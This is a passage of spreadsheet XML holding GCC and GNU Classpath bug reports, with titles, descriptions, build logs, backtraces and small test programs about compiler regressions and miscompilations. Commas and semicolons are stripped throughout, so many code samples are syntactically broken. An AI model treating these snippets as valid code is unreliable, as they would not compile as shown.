/.. -I/home/dara/branch/gcc/gcc/ada -I/home/dara/branch/gcc/gcc/ada/.. 
-I/home/dara/branch/gcc/gcc/ada/../config -I/home/dara/branch/gcc/gcc/ada/../..
/include -I./../.. adaint.c
adaint.c:68:22: sys/wait.h: No such file or directory
This is true: mingw32 has no sys/wait.h. But configure should either work around 
this or not allow gnatlib to be built on mingw32.</t>
  </si>
  <si>
    <t>GCC-2337</t>
  </si>
  <si>
    <t>Incomplete information in release notes</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/gcc-2.95/features.html says in the section
New Targets and Target Specific Improvements (as checked on
March 21):
Various changes to the MIPS port to avoid assembler macros which 
There is clearly something missing after the which. As we
do have problems with the gcc code generation under MIPS I would
be very interested to know what improvements exactly were done
for the MIPS and it would be great if you could correct the 
web page.
Release:
2.95.3
Environment:
MIPS</t>
  </si>
  <si>
    <t>GCC-24297</t>
  </si>
  <si>
    <t>[4.1 Regression] libtool: link: unable to infer tagged configuration</t>
  </si>
  <si>
    <t>make[3]: Entering directory `/home/dave/gnu/gcc-4.0/objdir/hppa-linux/boehm-gc'
gcc -B/home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/bin/ -B/home/dave/opt/gnu/gcc/
gcc-4.1.0/hppa-linux/lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/i
nclude -isystem /home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/sys-include -DHAVE_C
ONFIG_H -I. -I../../../gcc/boehm-gc -I./include -I./include  -I/home/dave/gnu/gc
c-4.0/gcc/boehm-gc/include  -fexceptions -Iinclude -I././targ-include -I.//libc/
include -O2 -g -O2  -c -o tests/test.o ../../../gcc/boehm-gc/tests/test.c
/bin/sh ./libtool --mode=link gcc -B/home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/
bin/ -B/home/dave/opt/gnu/gcc/gcc-4.1.0/hppa-linux/lib/ -isystem /home/dave/opt/
gnu/gcc/gcc-4.1.0/hppa-linux/include -isystem /home/dave/opt/gnu/gcc/gcc-4.1.0/h
ppa-linux/sys-include -fexceptions -Iinclude -I././targ-include -I.//libc/includ
e -O2 -g -O2   -o gctest -shared-libgcc tests/test.o ./libgcjgc.la -lpthread -ld
l
libtool: link: unable to infer tagged configuration
libtool: link: specify a tag with `--tag'
make[3]: *** [gctest] Error 1</t>
  </si>
  <si>
    <t>GCC-9296</t>
  </si>
  <si>
    <t>[*-rtems] gthr-rtems regression</t>
  </si>
  <si>
    <t>2003-01-13      Joel Sherrill 
        * gthr-rtems.h: Define __GTHREAD_MUTEX_INIT.  Apparently no code
        dependended on it being defined until now.
Release:
gcc 3.3 branch and presumably trunk</t>
  </si>
  <si>
    <t>GCC-34587</t>
  </si>
  <si>
    <t>gcc.dg/initpri1.c fails on *-apple-darwin</t>
  </si>
  <si>
    <t>The gcc.dg/initpri1.c testcase aborts on powerpc-apple-darwin9 in the following sections...
void c2() {
  if (i++ != 2)
    abort ()   &lt;===
}
[....]
void c3() {
  if (i++ != 1)
    abort ()   &lt;===
}
[...]
void d2() {
  if (--i != 2)
    abort ()  &lt;===
}
[...]
void d3() {
  if (j != 2)
    abort ()
  if (--i != 1)
    abort ()   &lt;====
}
I assume this should have been reported before but can't find any PR for it. The order of
the aborts are...
in c2
in c3
in d3 i
in d2</t>
  </si>
  <si>
    <t>GCC-36901</t>
  </si>
  <si>
    <t>pedwarn() + -pedantic-errors + -w (inhibit_warnings) should not emit errors</t>
  </si>
  <si>
    <t>From PR35637 but this is a general issue of the diagnostic machinery.
The problem is: -pedantic no warning -pedantic-errors gives an
error. 
Explanation: The pedantic warning is in a system header so it doesn't get emitted. When using -pedantic-errors it is an error and errors are always emitted.
Longer explanation: The problem is in
diagnostics.c (diagnostic_report_diagnostic) which checks only for DK_WARNING if 
they should be inhibited (either because of -w or because location is within system headers. However pedwarn() is passing a DK_ERROR when -pedantic-errors is enabled. 
One possible fix is that pedwarn() always passes a DK_WARNING type while -pedantic-errors reclassifies -pedantic warnings to emit errors. In other words -pedantic-errors would behave internally like -Werror=pedantic.</t>
  </si>
  <si>
    <t>GCC-51459</t>
  </si>
  <si>
    <t>[4.7 Regression] 'double free or corruption' involving std::function and lambdas</t>
  </si>
  <si>
    <t>Tested with gcc version 4.7.0 20111112 on 64-bit Linux.
~~~~~~~~~~~~~~~~~
#include 
#include 
template 
std::function animate(F f) { return [=]{ f() } }
int main()
{
    std::vector pv {0 0}
    pv.push_back(0)
    std::function linear1 = []{}
    std::vector&gt; av {animate(linear1) animate(linear1)}
    av[0]()
    return 0
}
~~~~~~~~~~~~~~~~~
Compiling and running this (`g++-4.7 -std=c++11 x.cpp`) results in:
*** glibc detected *** ./a.out: double free or corruption (fasttop): 0x0000000001c7b1c0 ***
======= Backtrace: =========
/lib/libc.so.6(+0x73466)[0x7fafc7a78466]
/lib/libc.so.6(cfree+0x6c)[0x7fafc7a7c33c]
....
~~~~~~~~~~~~~~~~~
g++-4.7 -v:
Using built-in specs.
COLLECT_GCC=g++-4.7
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /tmp/packerbuild-0/gcc-snapshot/gcc-snapshot/src/gcc-4.7-20111112/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share/gcc-4.7 --with-bugurl='http://aur.archlinux.org/packages.php?ID=16045' --enable-languages=cc++lto --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --enable-gnu-unique-object --enable-linker-build-id --with-ppl --enable-cloog-backend=isl --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-multilib --disable-libssp --disable-libstdcxx-pch --enable-checking=release --disable-werror --program-suffix=-4.7 --enable-version-specific-runtime-libs --disable-bootstrap
Thread model: posix
gcc version 4.7.0 20111112 (experimental) (GCC)</t>
  </si>
  <si>
    <t>kennytm</t>
  </si>
  <si>
    <t>GCC-36523</t>
  </si>
  <si>
    <t>OpenMP task construct fails to instantiate copy constructor</t>
  </si>
  <si>
    <t>The following test case fails with a linker error. It compiles okay with the pragma omp task line removed.
template
struct A
{
  A() { }
  A(const A&amp;) { }
  void foo() { }
}
int main()
{
  A a
  #pragma omp task
    a.foo()
  return 0
}
g++- -fopenmp -Wall task_instantiation.cpp
/tmp/ccQDTSgc.o: In function `main.omp_cpyfn.1':
task_instantiation.cpp:(.text+0x7e): undefined reference to `A::A(A const&amp;)'
collect2: ld returned 1 exit status
Workarounds:
-declare 'a' shared (mind data consistency)
-instantiate copy constructor explicitly</t>
  </si>
  <si>
    <t>GCC-78205</t>
  </si>
  <si>
    <t>BB vectorization confused by too large load groups</t>
  </si>
  <si>
    <t>double x a[4] b[4] c[5]
void foo ()
{
  a[0] = c[0]
  a[1] = c[1]
  a[2] = c[0]
  a[3] = c[1]
  b[0] = c[2]
  b[1] = c[3]
  b[2] = c[2]
  b[3] = c[3]
  x = c[4]
}
if you comment the load from c[4] the testcase will be vectorized.  If not the
we run into
      /* ???  The following is overly pessimistic (as well as the loop
         case above) in the case we can statically determine the excess
         elements loaded are within the bounds of a decl that is accessed.
         Likewise for BB vectorizations using masked loads is a possibility.  */
      if (bb_vinfo &amp;&amp; slp_perm &amp;&amp; group_size % nunits != 0)
        {
          dump_printf_loc (MSG_MISSED_OPTIMIZATION vect_location
                           BB vectorization with gaps at the end of a load 
                           is not supported\n)
          return false
        }
I do have a hackish patch.</t>
  </si>
  <si>
    <t>GCC-7483</t>
  </si>
  <si>
    <t>build_assertion gets assertion status wrong</t>
  </si>
  <si>
    <t xml:space="preserve">	The program:
        public class TestAssert {
            public static void main(String[] args) {
                boolean enabled = false
                assert enabled = true
                System.out.println(Asserts  + (enabled ? enabled : disabled))
            }
        }
        prints disabled even though VMClassLoader.defaultAssertionStatus()
        always returns true.
Release:
3.3 20020801 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-threads=posix --prefix=/home/user/jmr/app/gcc --enable-shared --enable-languages=c++java : (reconfigured)
How-To-Repeat:
 gcj -v --main=TestAssert TestAssert.java -o test_assert    
Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/../../../libgcj.spec
rename spec lib to liborig
Configured with: ../gcc/configure --enable-threads=posix --prefix=/home/user/jmr/app/gcc --enable-shared --enable-languages=c++java : (reconfigured) 
Thread model: posix
gcc version 3.3 20020801 (experimental)
 /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/jc1 TestAssert.java -fhash-synchronization -fno-use-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -fkeep-inline-functions -quiet -dumpbase TestAssert.java -g1 -version -o /tmp/ccg64c5c.s
GNU Java version 3.3 20020801 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.2 20020713 (experimental).
Class path starts here:
    ./
    /home/user/jmr/app/gcc/share/java/libgcj-3.3.jar/ (system) (zip)
 as --traditional-format -V -Qy -o /tmp/ccOs6Xkj.o /tmp/ccg64c5c.s
GNU assembler version 2.12 (i686-pc-linux-gnu) using BFD version 2.12
 /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/jvgenmain TestAssertmain /tmp/ccUGM6ar.i
 /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/cc1 /tmp/ccUGM6ar.i -quiet -dumpbase TestAssertmain.c -g1 -version -fdollars-in-identifiers -o /tmp/ccg64c5c.s
GNU C version 3.3 20020801 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.2 20020713 (experimental).
 as --traditional-format -V -Qy -o /tmp/ccymSnAz.o /tmp/ccg64c5c.s
GNU assembler version 2.12 (i686-pc-linux-gnu) using BFD version 2.12
 /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o test_assert /usr/lib/crt1.o /usr/lib/crti.o /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/crtbegin.o -L/home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3 -L/home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/../../.. /tmp/ccymSnAz.o /tmp/ccOs6Xkj.o -lgcc_s -lgcc -lgcj -lm -lpthread -ldl -lgcc_s -lgcc -lc -lgcc_s -lgcc /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.3/crtend.o /usr/lib/crtn.o
 ./test_assert
Asserts disabled</t>
  </si>
  <si>
    <t>GCC-83017</t>
  </si>
  <si>
    <t>DO CONCURRENT not parallelizing</t>
  </si>
  <si>
    <t>I found a strange behaviour which I think is a bug. I'm trying to split a loop with DO CONCURRENT and compile flag -ftree-parallelize-loops=2 . However whether parallelization actually happens depends on whether I use a computed vector index in an assignment or a constant index. The indexing happens inside a pure function so I believe that should not affect the outer do concurrent loop (?)
Here's my test code
! compile: 
!   gfortran -Ofast -march=native -ftree-parallelize-loops=2 -o main main.f90
! run
!   time ./main
program main
    use intrinsic :: iso_fortran_env
    implicit none
    integer parameter :: nsplit = 4
    integer(int64) parameter :: ne = 2000000000
    integer(int64) :: stride low(nsplit) high(nsplit) i
    real dimension(nsplit) :: pi
    stride = ceiling(real(ne)/nsplit)
    do i = 1 nsplit
        high(i) = stride*i
    end do
    do i = 2 nsplit
        low(i) = high(i-1) + 1
    end do
    low(1) = 1
    high(nsplit) = ne
    pi = 0
    do concurrent (i = 1:nsplit)
        pi(i) = sum(compute( low(i) high(i) ))
    end do
    print * PI 4*sum(pi)
    print * PI 4*atan(1.0)
contains
    pure function compute( low high ) result( tmp )        
        integer(int64) intent(in) :: low high
        real dimension(nsplit) :: tmp
        integer(int64) :: j k
        tmp = 0
! With this loop no parallelization happens
        do j = low high
            k = mod( j nsplit ) + 1
            tmp(k) = tmp(k) + (-1)**(j+1) / real( 2*j-1 )                                        
        end do
! With this loop the code is parallelized (apparent from time study)
!         do j = low high 4 ! nsplit is equal to 4
!             k = 1
!             tmp(k) = tmp(k) + (-1)**(j+1) / real( 2*j-1 )                            
!             k = 2
!             tmp(k) = tmp(k) + (-1)**(j+2) / real( 2*j+1 )                            
!             k = 3
!             tmp(k) = tmp(k) + (-1)**(j+3) / real( 2*j+3 )                            
!             k = 4
!             tmp(k) = tmp(k) + (-1)**(j+4) / real( 2*j+5 )                            
!         end do
    end function
end program main</t>
  </si>
  <si>
    <t>cfztol</t>
  </si>
  <si>
    <t>GCC-41127</t>
  </si>
  <si>
    <t>[4.4/4.5 regression] unnamed bitfield declaration parser regression</t>
  </si>
  <si>
    <t>The following code:
#define CHAR_BIT 8
enum EE {ee}
typedef unsigned int T
struct D {
        T : sizeof(unsigned int) * CHAR_BIT // OK
        EE : sizeof(EE) * CHAR_BIT // OK 
        enum EE : sizeof(EE) * CHAR_BIT // not OK 
        enum EE xxxx : sizeof(EE) * CHAR_BIT // OK 
        T x : sizeof(unsigned int) * CHAR_BIT // OK
        enum FF {ff} : sizeof(int) * CHAR_BIT // OK 
} element
enum EE xx
EE yy
has an issue (parser error) with the following version of g++:
g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-threads=posix --prefix=/prj/dsp/qdsp6_aus/users/slarin/x86_gcc_4.4/bin --enable-languages=cc++ --disable-checking
Thread model: posix
gcc version 4.4.0 (GCC)
The issue is the third member of the struct (enum EE : sizeof(EE) * CHAR_BIT)
In my understanding it is no different than the second member of the same struct (EE : sizeof(EE) * CHAR_BIT) and clearly works outside the struct scope (enum EE xx EE yy)..and further cured by giving it a name (enum EE xxxx : sizeof(EE) * CHAR_BIT) - this would be a workaround. My question - is this a front end regression between 4.3.2 and 4.4.0? 
As for the regression statement - it works with G++ 3.3.3 3.4.6 and 4.3.2. The C++98 standard clauses that seems appropriate are 9.6 9.7 and 7.2. If this is a deliberate decision to change the acceptable syntax what clauses from the same standard can you refer to? 
Thank you.</t>
  </si>
  <si>
    <t>CLASSPATH-24152</t>
  </si>
  <si>
    <t>major performance problem in JTextArea (TextModel?)</t>
  </si>
  <si>
    <t>The current implementation of JTextArea (or possibly the underlying TextModel
perhaps even a bug in pango) makes it impossible to display and edit texts
with more than a few hundred characters. The attached testcase demonstrates
that current cp cvs code uses algorithm(s) of at least O(N*N) while the
reference implementatin seems to behave like O(ln N) at most.
Users will rightly expect to load and edit texts with a least a few thousand 
lines without major performance problems. Actually I originally suspected
a complete deadlock in classpath for texts longer than a few hundred lines
but the testcase shows that things only get (real) ssllooww. 
---
Run the attached testcase and specify the number of lines-of-text as the
first argument. The program does the following:
* first create a JTextArea inside a JScrollPane inside a JFrame
* second create a random text with the specified number of lines
* third call setText() with the random text on the JTextArea
* fourth pack the JFrame
* five enter a loop that requests some JFrame resizing operations
The timing for all operations are measured via System.currentTimeMillis().
First as a reference some performance numbers for JDK 1.5.0 (SuSE linux x86
Athlon 2600+):
JDK 1.5.0  nlines  create  load-text     pack  resize   [msecs]
java PRuuu 20         143         71       47       1
java PRuuu 200        133         98       49       1
java PRuuu 2000       140        445       50       1
java PRuuu 20000      149       1350       52       1
And here the disappointing numbers from classpath (CVS HEAD 2005.09.30). 
Note that first-time initializiation is only four times slower on jamvm 
despite running interpreted (good!) but there seems at least an O(n^2) 
algorithm somewhere:
jamvm 1.3.2 with classpath cvs HEAD 2005.09.30 (-x200m -ms50m -verbose:gc)
jamvm+cp   nlines  create  load-text     pack  resize   [msecs]
jamvm PRuuu 20        589          5      117       80
jamvm PRuuu 40        582          6      426      275
jamvm PRuuu 80        581         10     1404     1100
jamvm PRuuu 160       584         18     5736     5000
jamvm PRuuu 320       583         35    23898    18250
...
jamvm PRuuu 2000      591        228   xxxxxx   xxxxxx  (canceled)
jamvm PRuuu 20000     594       2384 xxxxxxxx xxxxxxxx  (canceled)
Also note that the JScrollPane is not working at all :-(
A stacktrace from gdb with jamvm stuck somewhere in the pack() call
shows the following:
(gdb) where
#0  0x40031e56 in __pthread_alt_unlock () from /lib/libpthread.so.0
#1  0x4002ebff in pthread_mutex_unlock () from /lib/libpthread.so.0
#2  0x40123965 in malloc () from /lib/libc.so.6
#3  0x4d61be22 in IA__g_malloc (n_bytes=1075709472) at gmem.c:137
#4  0x4d5a8aaa in new_type_link () at fribidi.c:77
#5  0x4d5a8b40 in run_length_encode_types (char_type=0x8528718 type_len=103)
    at fribidi.c:119
#6  0x4d5a8fb1 in fribidi_analyse_string (str=0x85274d0 len=103 
    pbase_dir=0xbffff250 ptype_rl_list=0x1 
    pmax_level=0x1 ) at fribidi.c:533
#7  0x4d5a9a40 in pango_log2vis_get_embedding_levels (str=0x85274d0 
    len=1075709488 pbase_dir=0x1 
    embedding_level_list=0x8527678 |\006\036@|\006\036@L) at fribidi.c:1034
---Type  to continue or q  to quit---
#8  0x4d5971fe in itemize_state_init (state=0xbffff2e0 context=0x1 
    text=0x1  base_dir=PANGO_DIRECTION_LTR 
    start_index=24666 length=103 attrs=0x834ac38 cached_iter=0x83dc3d0 
    desc=0x0) at pango-context.c:664
#9  0x4d597ed7 in pango_itemize_with_base_dir (context=0x401e0630 
    base_dir=PANGO_DIRECTION_LTR 
    text=0xbffff2e0 \200@-\b\200ÂªD\bA\vE\bÃš\nE\bÂ°\003gM start_index=1 
    length=1 attrs=0x834ac38 cached_iter=0x83dc3d0) at pango-context.c:1183
#10 0x4d59f208 in pango_layout_check_lines (layout=0x82dd438)
    at pango-layout.c:3211
#11 0x4d59d715 in pango_layout_get_extents_internal (layout=0x82dd438 
    ink_rect=0x0 logical_rect=0xbffff50c line_extents=0x0)
    at pango-layout.c:2005
---Type  to continue or q  to quit---
#12 0x4d59da58 in pango_layout_get_extents (layout=0x1 ink_rect=0x0 
    logical_rect=0xbffff50c) at pango-layout.c:2151
#13 0x4d0cac49 in Java_gnu_java_awt_peer_gtk_GdkFontPeer_getTextMetrics (
    env=0x8061794 java_font=0x1 str=0x41fd9610 java_metrics=0x41ff4f68)
    at gnu_java_awt_peer_gtk_GdkFontPeer.c:301
#14 0x0805d875 in callJNIMethod (env=0x8061794 class=0x0 
    sig=0x829c798 (Ljava/lang/String[D)V ret_type=0 ostack=0x8083180 
    f=0x4d0cabb0 U\211Ã¥WVSÃ¨\232Â¬Ã¿Ã¿\201Ãƒ9Ã¹\001 args=3) at dll_md.c:64
#15 0x0804e931 in callJNIWrapper (class=0x0 mb=0x82b167c ostack=0x1)
    at dll.c:325
#16 0x08051856 in executeJava () at interp.c:2236
#17 0x0804f557 in executeMethodVaList (ob=Variable ob is not available.
) at execute.c:66
#18 0x0804f5f9 in executeMethodArgs (ob=0x1 class=0x1 mb=0x1) at execute.c:38
---Type  to continue or q  to quit---
#19 0x08052a97 in main (argc=6 argv=0xbffff774) at jam.c:327</t>
  </si>
  <si>
    <t>GCC-43742</t>
  </si>
  <si>
    <t>[4.6 Regression] web.c/union_match_dups segfaults for a null *ref on sh-elf</t>
  </si>
  <si>
    <t>sh4-unknown-linux-gnu failed to build during compiling libgfortran
with
/exp/ldroot/dodes/xsh-gcc-orig/./gcc/xgcc -B/exp/ldroot/dodes/xsh-gcc-orig/./gcc/ -B/usr/local/sh4-unknown-linux-gnu/bin/ -B/usr/local/sh4-unknown-linux-gnu/lib/ -isystem /usr/local/sh4-unknown-linux-gnu/include -isystem /usr/local/sh4-unknown-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I../../../ORIG/trunk/libgfortran -iquote../../../ORIG/trunk/libgfortran/io -I../../../ORIG/trunk/libgfortran/../gcc -I../../../ORIG/trunk/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -ffunction-sections -fdata-sections -mieee -ftree-vectorize -funroll-loops -g -O2 -MT matmul_i1.lo -MD -MP -MF .deps/matmul_i1.Tpo -c ../../../ORIG/trunk/libgfortran/generated/matmul_i1.c  -fPIC -DPIC -o .libs/matmul_i1.o
../../../ORIG/trunk/libgfortran/generated/matmul_i1.c: In function 'matmul_i1':
../../../ORIG/trunk/libgfortran/generated/matmul_i1.c:374:1: internal compiler error: Segmentation fault
It starts to fail after
r158187 | bernds | 2010-04-10 21:30:29 +0900 (Sat 10 Apr 2010) | 7 lines
	* Makefile.in (web.o): Depend on insn-config.h and $(RECOG_H).
	* web.c: Include insn-config.h and recog.h.
	(union_match_dups): New function.
	(web_main): Call it.
	(union_defs): Don't try to recognize match_dups.
and that segfault happens at the line
      (*fun) (use_entry + DF_REF_ID (*dupref) entry + DF_REF_ID (*ref))
of union_match_dups for a null *ref.</t>
  </si>
  <si>
    <t>GCC-56407</t>
  </si>
  <si>
    <t>[4.7 Regression] Optimizations (-O2 -O3) make comparison of arrays of ints to fail</t>
  </si>
  <si>
    <t>Created attachment 29509
The .c .i .s .o files
This is my first bug report so I hope this is really a bug and that I file it correctly.
Versions of my stuff:
- gcc (Debian 4.7.2-5) 4.7.2
- Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.35-2 x86_64 GNU/Linux
- Intel(R) Core(TM)2 Duo CPU T9600 @ 2.80GHz
gcc compile stuff:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.7.2-5' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --with-arch-32=i586 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.2 (Debian 4.7.2-5) 
The bug appears when I compile the program with -O2 or -O3:
$ gcc -O3 gcc_bug.c -o gcc_bug
$ ./gcc_bug &amp;&amp; echo ok || echo fail
fail
But it works fine with -O1:
$ gcc -O1 gcc_bug.c -o gcc_bug
$ ./gcc_bug &amp;&amp; echo ok || echo fail
ok
It works fine with an older version of gcc:
$ gcc --version
gcc (GCC) 4.4.6 20120305 (Red Hat 4.4.6-4)
$ gcc -v
Using built-in specs.
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC)
$ gcc -O3 gcc_bug.c -o gcc_bug
$ ./gcc_bug &amp;&amp; echo ok || echo fail
ok
When the program fails with gcc 4.7.2 valgrind tells me:
$ gcc -O3 -g gcc_bug.c -o gcc_bug
$ valgrind ./gcc_bug
==3383== Memcheck a memory error detector
==3383== Copyright (C) 2002-2011 and GNU GPL'd by Julian Seward et al.
==3383== Using Valgrind-3.7.0 and LibVEX rerun with -h for copyright info
==3383== Command: ./gcc_bug
==3383== 
==3383== Conditional jump or move depends on uninitialised value(s)
==3383==    at 0x40079E: test (gcc_bug.c:21)
==3383==    by 0x400482: main (gcc_bug.c:41)
==3383== 
==3383== 
==3383== HEAP SUMMARY:
==3383==     in use at exit: 0 bytes in 0 blocks
==3383==   total heap usage: 0 allocs 0 frees 0 bytes allocated
==3383== 
==3383== All heap blocks were freed -- no leaks are possible
==3383== 
==3383== For counts of detected and suppressed errors rerun with: -v
==3383== Use --track-origins=yes to see where uninitialised values come from
==3383== ERROR SUMMARY: 2 errors from 1 contexts (suppressed: 4 from 4)
Whereas all is fine for valgrind with -O1. Also all is fine with -fwrapv:
$ gcc -O3 -fwrapv gcc_bug.c -o gcc_bug
$ ./gcc_bug &amp;&amp; echo ok || echo fail
ok
I suppose the bug appears when gcc is doing some optimizations but I do not know which. Any small modifications to the program make it work. For example if I remove the ``if ( comm ) { line or if I replace ``for( j = 1  j &lt;= sz by ``for( j = 1  j &lt; sz.
======================================
extern void exit(int)
extern int rand(void)
void copy(int *rint *aint na) {
  int i
  for( i = 0  i &lt; na  i++ ) {
    r[i] = a[i]
  }
}
void random(int *aint na) {
  int i
  for( i = 0  i &lt; na  i++ ) {
    a[i] = rand()
  }
}
int cmp(int *aint *bint n) {
  int i
  for( i = 0  i &lt; n  i++ ) {
    if ( a[i] != b[i] ) return -1
  }
  return 0
}
void test(int szint comm) {
  int jn
  int v[64]w[64]
  for( j = 1  j &lt;= sz  j++ ) {
    n = (2 * j - 1) * (2 * j - 1)
    random(wn)
    copy(vwn)
    if ( comm ) {
      if ( cmp(vwn) ) exit(-1)
    }
  }
  exit(0)
}
int main(void) {
  test(21)
  return 0
}
======================================</t>
  </si>
  <si>
    <t>quintin</t>
  </si>
  <si>
    <t>GCC-23775</t>
  </si>
  <si>
    <t>[4.1 Regression] wrong code in argument passing</t>
  </si>
  <si>
    <t xml:space="preserve">
On a i686 platform the example below is miscompiled with -O1.
I expect this program to print -0.96.  Here's what it actually does:
$ g++ -O1 -o y y.cc
$ ./y
-1.288766
$ g++  -o y y.cc
$ ./y
-0.960000
$
The value that the optimized version prints is actually different
on each run of the program.
Here's the generated code for main() 
.globl main
	.type	main @function
main:
	pushl	%ebp
	movl	%esp %ebp
	subl	$24 %esp
	movl	%ebx -8(%ebp)
	movl	%esi -4(%ebp)
	andl	$-16 %esp
	subl	$16 %esp
	movl	$0 12(%esp)
	movl	8(%esp) %ebx     this seems to load ebx with garbage???
	movl	12(%esp) %esi
	fldz
	fstl	8(%esp)
	fstpl	(%esp)
	call	_Z8x_from_zdd
	fstpl	4(%esp)
	movl	%ebx 8(%esp)     this clobbers half of the arg with
                                  the garbage
	movl	%esi 12(%esp)
	movl	$0 (%esp)
	call	_Z17local_to_trflocalidi
	movl	$0 %eax
	movl	-8(%ebp) %ebx
	movl	-4(%ebp) %esi
	movl	%ebp %esp
	popl	%ebp
	ret
It looks to me like the error occurs during RTL generation.
Here's the tree dump from the t87.final_cleanup file (slightly trimmed):
void local_to_trflocal(int double int) (D.1741 x_loc D.1743)
{
:
  printf (
  return
}
double x_from_z(double double) (pitch stereo)
{
:
  return -9.59999999999999964472863211994990706443786621094e-1 / cos (stereo)
}
int main() ()
{
:
  local_to_trflocal (0 x_from_z (0.0 0.0) 0)
  return 0
}
But in the 00.expand file here's the sequence leading
to the local_to_trflocal() call:
(insn 27 26 28 1 (set (mem/i:DF (plus:SI (reg/f:SI 56 virtual-outgoing-args)
                (const_int 4 [0x4])) [0 S8 A32])
        (reg:DF 71)) -1 (nil)
    (nil))
(insn 28 27 29 1 (set (mem:DI (plus:SI (reg/f:SI 56 virtual-outgoing-args)
                (const_int 8 [0x8])) [0 S8 A8])
        (reg:DI 68)) -1 (nil)
    (nil))
(insn 29 28 30 1 (set (mem:SI (reg/f:SI 56 virtual-outgoing-args) [0 S4 A32])
        (const_int 0 [0x0])) -1 (nil)
    (nil))
(call_insn 30 29 31 1 (call (mem:QI (symbol_ref:SI (_Z17local_to_trflocalidi) [flags 0x3] ) [0 S1 A8])
        (const_int 16 [0x10])) -1 (nil)
    (nil)
    (nil))
Reg 71 here is the return value from x_from_z.
I don't know where the DI store to v-o-a+8 is coming from...
Environment:
System: Linux karma 2.6.12.1sss #2 Thu Jul 7 00:28:21 EDT 2005 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/sss/gcc/gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f95
How-To-Repeat:
Compile with -O1
-----------------------------------------------------
//g++ -O1 -g -o y y.cc 
extern C double cos(double)
extern C int printf (...)
double x_from_z(double pitch=0 double stereo=0)
{
  return -0.96/cos(stereo)
}
void local_to_trflocal(int double x_loc int=0)
{
  printf (%f\n x_loc)
}
int main()
{
  local_to_trflocal(0 x_from_z())
  return 0
}
-----------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-29473</t>
  </si>
  <si>
    <t>-masm=intel combined with -march=athlon64 has some issues.</t>
  </si>
  <si>
    <t>Here is my test case:
unsigned char Keep4_3Ratio
unsigned long SMode=0 DSMode=0
bool CheckTVRatioReq()
{
  return(Keep4_3Ratio 
}
Compiling on an x86-32 compiler with the following:
